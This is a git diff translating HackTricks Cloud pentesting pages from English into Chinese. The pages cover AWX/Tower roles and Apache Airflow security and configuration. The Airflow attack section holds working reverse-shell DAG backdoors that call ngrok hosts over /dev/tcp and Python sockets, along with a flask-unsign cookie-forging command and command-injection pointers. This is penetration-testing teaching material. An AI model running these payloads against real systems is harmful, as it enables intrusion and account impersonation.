diff --git a/src/README.md b/src/README.md
index 01b146fd1..35cd94e16 100644
--- a/src/README.md
+++ b/src/README.md
@@ -1,31 +1,31 @@
# HackTricks Cloud
-Reading time: {{ #reading_time }}
+阅读时间: {{ #reading_time }}
{{#include ./banners/hacktricks-training.md}}
-_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
+_Hacktricks 标志和动画设计由_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
> [!TIP]
-> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news.
+> 欢迎来到这个页面,在这里你将找到我在 **CTFs**、**真实**生活**环境**、**研究**和**阅读**研究和新闻中学到的每一个与 **CI/CD & Cloud** 相关的 **黑客技巧/技术/其他**。
### **Pentesting CI/CD Methodology**
-**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
+**在 HackTricks CI/CD 方法论中,你将找到如何对与 CI/CD 活动相关的基础设施进行渗透测试。** 阅读以下页面以获取 **介绍:**
[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
### Pentesting Cloud Methodology
-**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
+**在 HackTricks Cloud 方法论中,你将找到如何对云环境进行渗透测试。** 阅读以下页面以获取 **介绍:**
[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
### License & Disclaimer
-**Check them in:**
+**请查看:**
[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
@@ -34,7 +34,3 @@ _Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.co
{{#include ./banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index feae5163c..1b1d60c58 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -505,3 +505,5 @@
+
+
diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md
index b684cee3d..50f6953db 100644
--- a/src/banners/hacktricks-training.md
+++ b/src/banners/hacktricks-training.md
@@ -1,17 +1,13 @@
> [!TIP]
-> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+> 学习和实践 AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+> 学习和实践 GCP Hacking:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
>
>
>
-> Support HackTricks
+> 支持 HackTricks
>
-> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+> - 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
+> - **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+> - **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
>
>
-
-
-
-
diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
index d3fbf19e5..094f41ce0 100644
--- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
+++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
@@ -2,62 +2,61 @@
{{#include ../banners/hacktricks-training.md}}
-## Basic Information
+## 基本信息
-**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansible’s user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower’s REST API and command-line interface make it simple to integrate it into current tools and workflows.
+**Ansible Tower** 或其开源版本 [**AWX**](https://github.com/ansible/awx) 也被称为 **Ansible 的用户界面、仪表板和 REST API**。通过 **基于角色的访问控制**、作业调度和图形化库存管理,您可以通过现代用户界面管理您的 Ansible 基础设施。Tower 的 REST API 和命令行界面使其易于集成到当前工具和工作流程中。
-**Automation Controller is a newer** version of Ansible Tower with more capabilities.
+**Automation Controller 是 Ansible Tower 的一个更新版本,具有更多功能。**
-### Differences
+### 差异
-According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows.
+根据 [**这篇文章**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00),Ansible Tower 和 AWX 之间的主要区别在于获得的支持,Ansible Tower 具有额外的功能,如基于角色的访问控制、对自定义 API 的支持和用户定义的工作流程。
-### Tech Stack
+### 技术栈
-- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs.
-- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface.
-- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data.
-- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners.
-- **Redis**: Redis serves as a cache and a backend for the task queue.
+- **Web 界面**:这是用户可以管理库存、凭据、模板和作业的图形界面。它旨在直观,并提供可视化以帮助理解自动化作业的状态和结果。
+- **REST API**:您可以在 Web 界面中执行的所有操作,也可以通过 REST API 执行。这意味着您可以将 AWX/Tower 与其他系统集成或编写通常在界面中执行的操作脚本。
+- **数据库**:AWX/Tower 使用数据库(通常是 PostgreSQL)来存储其配置、作业结果和其他必要的操作数据。
+- **RabbitMQ**:这是 AWX/Tower 用于在不同组件之间通信的消息系统,特别是在 Web 服务和任务运行器之间。
+- **Redis**:Redis 作为缓存和任务队列的后端。
-### Logical Components
+### 逻辑组件
-- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc.
-- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed..
-- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job.
-- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run.
-- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials.
-- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events.
-- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc.
-- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed.
+- **库存**:库存是一个 **主机(或节点)的集合**,可以对其 **运行作业**(Ansible 剧本)。AWX/Tower 允许您定义和分组库存,并支持动态库存,可以 **从其他系统获取主机列表**,如 AWS、Azure 等。
+- **项目**:项目本质上是一个 **Ansible 剧本的集合**,来源于 **版本控制系统**(如 Git),以便在需要时提取最新的剧本。
+- **模板**:作业模板定义 **特定剧本将如何运行**,指定 **库存**、**凭据** 和其他 **参数**。
+- **凭据**:AWX/Tower 提供了一种安全的方式来 **管理和存储秘密,如 SSH 密钥、密码和 API 令牌**。这些凭据可以与作业模板关联,以便剧本在运行时具有必要的访问权限。
+- **任务引擎**:这是魔法发生的地方。任务引擎基于 Ansible 构建,负责 **运行剧本**。作业被分派到任务引擎,然后使用指定的凭据在指定的库存上运行 Ansible 剧本。
+- **调度程序和回调**:这些是 AWX/Tower 中的高级功能,允许 **作业在特定时间调度运行**或由外部事件触发。
+- **通知**:AWX/Tower 可以根据作业的成功或失败发送通知。它支持多种通知方式,如电子邮件、Slack 消息、Webhooks 等。
+- **Ansible 剧本**:Ansible 剧本是配置、部署和编排工具。它们以自动化、可重复的方式描述系统的期望状态。剧本使用 YAML 编写,利用 Ansible 的声明性自动化语言描述需要执行的配置、任务和步骤。
-### Job Execution Flow
+### 作业执行流程
-1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower.
-2. **Job Initiation**:
- - The user, via the Web Interface or API, initiates a job based on a **Job Template**.
- - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**.
- - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution.
-3. **Job Queuing**:
- - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ.
- - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution.
-4. **Job Execution**:
- - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials.
- - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**.
- - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**.
-5. **Job Results**:
- - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**.
- - Users can then view the results through the Web Interface or query them via the REST API.
- - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc.
-6. **External Systems Integration**:
- - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more.
- - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution.
- - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times.
+1. **用户交互**:用户可以通过 **Web 界面** 或 **REST API** 与 AWX/Tower 交互。这些提供了对 AWX/Tower 提供的所有功能的前端访问。
+2. **作业启动**:
+ - 用户通过 Web 界面或 API 启动基于 **作业模板** 的作业。
+ - 作业模板包括对 **库存**、**项目**(包含剧本)和 **凭据** 的引用。
+ - 在作业启动时,向 AWX/Tower 后端发送请求以将作业排队执行。
+3. **作业排队**:
+ - **RabbitMQ** 处理 Web 组件与任务运行器之间的消息传递。一旦作业启动,消息将通过 RabbitMQ 发送到任务引擎。
+ - **Redis** 作为任务队列的后端,管理等待执行的排队作业。
+4. **作业执行**:
+ - **任务引擎** 拾取排队的作业。它从 **数据库** 中检索与作业相关的剧本、库存和凭据的必要信息。
+ - 使用从相关 **项目** 中检索的 Ansible 剧本,任务引擎在指定的 **库存** 节点上使用提供的 **凭据** 运行剧本。
+ - 当剧本运行时,其执行输出(日志、事实等)被捕获并存储在 **数据库** 中。
+5. **作业结果**:
+ - 一旦剧本完成运行,结果(成功、失败、日志)将保存到 **数据库** 中。
+ - 用户可以通过 Web 界面查看结果或通过 REST API 查询结果。
+ - 根据作业结果,可以发送 **通知** 以告知用户或外部系统作业的状态。通知可以是电子邮件、Slack 消息、Webhooks 等。
+6. **外部系统集成**:
+ - **库存** 可以从外部系统动态获取,允许 AWX/Tower 从 AWS、Azure、VMware 等来源提取主机。
+ - **项目**(剧本)可以从版本控制系统中提取,确保在作业执行期间使用最新的剧本。
+ - **调度程序和回调** 可用于与其他系统或工具集成,使 AWX/Tower 对外部触发器做出反应或在预定时间运行作业。
-### AWX lab creation for testing
-
-[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX:
+### AWX 实验室创建以进行测试
+[**按照文档**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) 可以使用 docker-compose 运行 AWX:
```bash
git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version
@@ -83,61 +82,56 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser
# Load demo data
docker exec tools_awx_1 awx-manage create_preload_data
```
-
## RBAC
-### Supported roles
+### 支持的角色
-The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**.
+最特权的角色称为 **System Administrator**。拥有此角色的任何人都可以 **修改任何内容**。
-From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one.
+从 **白盒安全** 审查的角度来看,您需要 **System Auditor role**,该角色允许 **查看所有系统数据** 但不能进行任何更改。另一个选择是获取 **Organization Auditor role**,但获取前者会更好。
-Expand this to get detailed description of available roles
+展开以获取可用角色的详细描述
1. **System Administrator**:
- - This is the superuser role with permissions to access and modify any resource in the system.
- - They can manage all organizations, teams, projects, inventories, job templates, etc.
+- 这是具有访问和修改系统中任何资源权限的超级用户角色。
+- 他们可以管理所有组织、团队、项目、库存、作业模板等。
2. **System Auditor**:
- - Users with this role can view all system data but cannot make any changes.
- - This role is designed for compliance and oversight.
+- 拥有此角色的用户可以查看所有系统数据,但不能进行任何更改。
+- 此角色旨在用于合规性和监督。
3. **Organization Roles**:
- - **Admin**: Full control over the organization's resources.
- - **Auditor**: View-only access to the organization's resources.
- - **Member**: Basic membership in an organization without any specific permissions.
- - **Execute**: Can run job templates within the organization.
- - **Read**: Can view the organization’s resources.
+- **Admin**: 对组织资源的完全控制。
+- **Auditor**: 仅查看组织资源的访问权限。
+- **Member**: 在组织中的基本成员身份,没有任何特定权限。
+- **Execute**: 可以在组织内运行作业模板。
+- **Read**: 可以查看组织的资源。
4. **Project Roles**:
- - **Admin**: Can manage and modify the project.
- - **Use**: Can use the project in a job template.
- - **Update**: Can update project using SCM (source control).
+- **Admin**: 可以管理和修改项目。
+- **Use**: 可以在作业模板中使用该项目。
+- **Update**: 可以使用 SCM(源代码管理)更新项目。
5. **Inventory Roles**:
- - **Admin**: Can manage and modify the inventory.
- - **Ad Hoc**: Can run ad hoc commands on the inventory.
- - **Update**: Can update the inventory source.
- - **Use**: Can use the inventory in a job template.
- - **Read**: View-only access.
+- **Admin**: 可以管理和修改库存。
+- **Ad Hoc**: 可以在库存上运行临时命令。
+- **Update**: 可以更新库存源。
+- **Use**: 可以在作业模板中使用库存。
+- **Read**: 仅查看访问权限。
6. **Job Template Roles**:
- - **Admin**: Can manage and modify the job template.
- - **Execute**: Can run the job.
- - **Read**: View-only access.
+- **Admin**: 可以管理和修改作业模板。
+- **Execute**: 可以运行作业。
+- **Read**: 仅查看访问权限。
7. **Credential Roles**:
- - **Admin**: Can manage and modify the credentials.
- - **Use**: Can use the credentials in job templates or other relevant resources.
- - **Read**: View-only access.
+- **Admin**: 可以管理和修改凭据。
+- **Use**: 可以在作业模板或其他相关资源中使用凭据。
+- **Read**: 仅查看访问权限。
8. **Team Roles**:
- - **Member**: Part of the team but without any specific permissions.
- - **Admin**: Can manage the team's members and associated resources.
+- **Member**: 团队的一部分,但没有任何特定权限。
+- **Admin**: 可以管理团队成员和相关资源。
9. **Workflow Roles**:
- - **Admin**: Can manage and modify the workflow.
- - **Execute**: Can run the workflow.
- - **Read**: View-only access.
+- **Admin**: 可以管理和修改工作流。
+- **Execute**: 可以运行工作流。
+- **Read**: 仅查看访问权限。
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md
index aac46128c..03870395f 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/README.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/README.md
@@ -2,22 +2,21 @@
{{#include ../../banners/hacktricks-training.md}}
-### Basic Information
+### 基本信息
-[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
+[**Apache Airflow**](https://airflow.apache.org) 是一个用于 **编排和调度数据管道或工作流** 的平台。在数据管道的上下文中,“编排”一词指的是安排、协调和管理来自各种来源的复杂数据工作流的过程。这些编排的数据管道的主要目的是提供经过处理和可消费的数据集。这些数据集被广泛应用于众多应用程序,包括但不限于商业智能工具、数据科学和机器学习模型,所有这些都是大数据应用程序正常运行的基础。
-Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
+基本上,Apache Airflow 允许您 **在发生某些事情时调度代码的执行**(事件,cron)。
-### Local Lab
+### 本地实验室
#### Docker-Compose
-You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
+您可以使用来自 [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) 的 **docker-compose 配置文件** 启动一个完整的 Apache Airflow Docker 环境。(如果您使用的是 MacOS,请确保为 Docker 虚拟机分配至少 6GB 的内存)。
#### Minikube
-One easy way to **run apache airflo**w is to run it **with minikube**:
-
+一种简单的方法是 **使用 minikube 运行 apache airflow**:
```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
@@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow
# Use this command to delete it
helm delete airflow-release
```
+### Airflow 配置
-### Airflow Configuration
-
-Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
+Airflow 可能在其配置中存储 **敏感信息**,或者您可能会发现存在弱配置:
{{#ref}}
airflow-configuration.md
@@ -38,65 +36,62 @@ airflow-configuration.md
### Airflow RBAC
-Before start attacking Airflow you should understand **how permissions work**:
+在攻击 Airflow 之前,您应该了解 **权限是如何工作的**:
{{#ref}}
airflow-rbac.md
{{#endref}}
-### Attacks
+### 攻击
-#### Web Console Enumeration
+#### Web 控制台枚举
-If you have **access to the web console** you might be able to access some or all of the following information:
+如果您有 **访问 web 控制台** 的权限,您可能能够访问以下一些或全部信息:
-- **Variables** (Custom sensitive information might be stored here)
-- **Connections** (Custom sensitive information might be stored here)
- - Access them in `http:///connection/list/`
-- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
-- List **users & roles**
-- **Code of each DAG** (which might contain interesting info)
+- **变量**(自定义敏感信息可能存储在这里)
+- **连接**(自定义敏感信息可能存储在这里)
+- 在 `http:///connection/list/` 中访问它们
+- [**配置**](./#airflow-configuration)(敏感信息如 **`secret_key`** 和密码可能存储在这里)
+- 列出 **用户和角色**
+- **每个 DAG 的代码**(可能包含有趣的信息)
-#### Retrieve Variables Values
+#### 检索变量值
-Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\
-Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
+变量可以存储在 Airflow 中,以便 **DAG** 可以 **访问** 其值。这类似于其他平台的秘密。如果您有 **足够的权限**,可以在 `http:///variable/list/` 的 GUI 中访问它们。\
+Airflow 默认会在 GUI 中显示变量的值,但是,根据 [**这个**](https://marclamberti.com/blog/variables-with-apache-airflow/),可以设置一个 **变量列表**,其 **值** 将在 **GUI** 中显示为 **星号**。
.png>)
-However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
-To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
-Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
+然而,这些 **值** 仍然可以通过 **CLI**(您需要有数据库访问权限)、**任意 DAG** 执行、**API** 访问变量端点(API 需要被激活),甚至 **GUI 本身** 来 **检索**!\
+要从 GUI 访问这些值,只需 **选择您想访问的变量**,然后 **点击操作 -> 导出**。\
+另一种方法是对 **隐藏值** 执行 **暴力破解**,使用 **搜索过滤** 直到您获得它:
.png>)
-#### Privilege Escalation
-
-If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
+#### 权限提升
+如果 **`expose_config`** 配置设置为 **True**,则从 **用户角色** 及 **以上** 可以 **读取** **web 中的配置**。在此配置中,**`secret_key`** 出现,这意味着任何拥有此有效密钥的用户都可以 **创建自己的签名 cookie 来冒充任何其他用户帐户**。
```bash
flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
+#### DAG 后门 (Airflow worker 中的 RCE)
-#### DAG Backdoor (RCE in Airflow worker)
-
-If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
-Note that this reverse shell is going to be executed inside an **airflow worker container**:
-
+如果您对 **DAG 保存的位置** 有 **写入权限**,您可以 **创建一个** 发送 **反向 shell** 的 **DAG**。\
+请注意,这个反向 shell 将在 **airflow worker 容器** 内执行:
```python
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
- dag_id='rev_shell_bash',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_bash',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = BashOperator(
- task_id='run',
- bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
- )
+run = BashOperator(
+task_id='run',
+bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
+)
```
```python
@@ -105,75 +100,66 @@ from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
+s = socket.socket()
+s.connect((rhost, port))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn("/bin/sh")
with DAG(
- dag_id='rev_shell_python',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_python',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = PythonOperator(
- task_id='rs_python',
- python_callable=rs,
- op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
- )
+run = PythonOperator(
+task_id='rs_python',
+python_callable=rs,
+op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
+)
```
-
#### DAG Backdoor (RCE in Airflow scheduler)
-If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
-
+如果您将某些内容设置为**在代码的根目录中执行**,在撰写本文时,它将在将其放入DAG文件夹后几秒钟内**由调度程序执行**。
```python
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
+s = socket.socket()
+s.connect((rhost, port))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
- dag_id='rev_shell_python2',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_python2',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = PythonOperator(
- task_id='rs_python2',
- python_callable=rs,
- op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
+run = PythonOperator(
+task_id='rs_python2',
+python_callable=rs,
+op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
+#### DAG 创建
-#### DAG Creation
+如果你成功地**攻陷了 DAG 集群中的一台机器**,你可以在 `dags/` 文件夹中创建新的 **DAG 脚本**,它们将会在 DAG 集群中的其余机器上**复制**。
-If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
+#### DAG 代码注入
-#### DAG Code Injection
+当你从 GUI 执行一个 DAG 时,你可以**传递参数**给它。\
+因此,如果 DAG 编写不当,它可能会**容易受到命令注入的攻击。**\
+这就是在这个 CVE 中发生的情况:[https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
-When you execute a DAG from the GUI you can **pass arguments** to it.\
-Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
-That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
-
-All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
-
-Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
+你需要知道的**开始寻找 DAG 中命令注入的方法**是**参数**是通过代码**`dag_run.conf.get("param_name")`**来**访问**的。
+此外,**变量**也可能出现相同的漏洞(请注意,拥有足够权限的情况下,你可以在 GUI 中**控制变量的值**)。变量通过以下方式**访问**:
```python
from airflow.models import Variable
[...]
foo = Variable.get("foo")
```
-
-If they are used for example inside a a bash command, you could perform a command injection.
+如果它们例如在 bash 命令中使用,您可能会执行命令注入。
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
index 5fd8e486b..413dab94b 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md
@@ -4,112 +4,102 @@
## Configuration File
-**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
+**Apache Airflow** 在所有的 airflow 机器上生成一个 **config file**,称为 **`airflow.cfg`**,位于 airflow 用户的主目录中。此配置文件包含配置信息,并且 **可能包含有趣和敏感的信息。**
-**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
+**访问此文件有两种方式:通过攻陷某个 airflow 机器,或访问 web 控制台。**
-Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
+请注意,**配置文件中的值** **可能不是实际使用的值**,因为您可以通过设置环境变量如 `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` 来覆盖它们。
-If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
-If you have **access to some machine inside the airflow env**, check the **environment**.
+如果您可以访问 **web 服务器中的配置文件**,您可以在同一页面上检查 **实际运行的配置**。\
+如果您有 **访问 airflow 环境中某台机器的权限**,请检查 **环境**。
-Some interesting values to check when reading the config file:
+在阅读配置文件时,一些有趣的值:
### \[api]
-- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
-- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
-- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
-- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
- - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- - `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- - You can also **create you own authentication** method with python.
-- **`google_key_path`:** Path to the **GCP service account key**
+- **`access_control_allow_headers`**: 这表示 **CORS** 的 **允许** **头部**
+- **`access_control_allow_methods`**: 这表示 **CORS** 的 **允许方法**
+- **`access_control_allow_origins`**: 这表示 **CORS** 的 **允许来源**
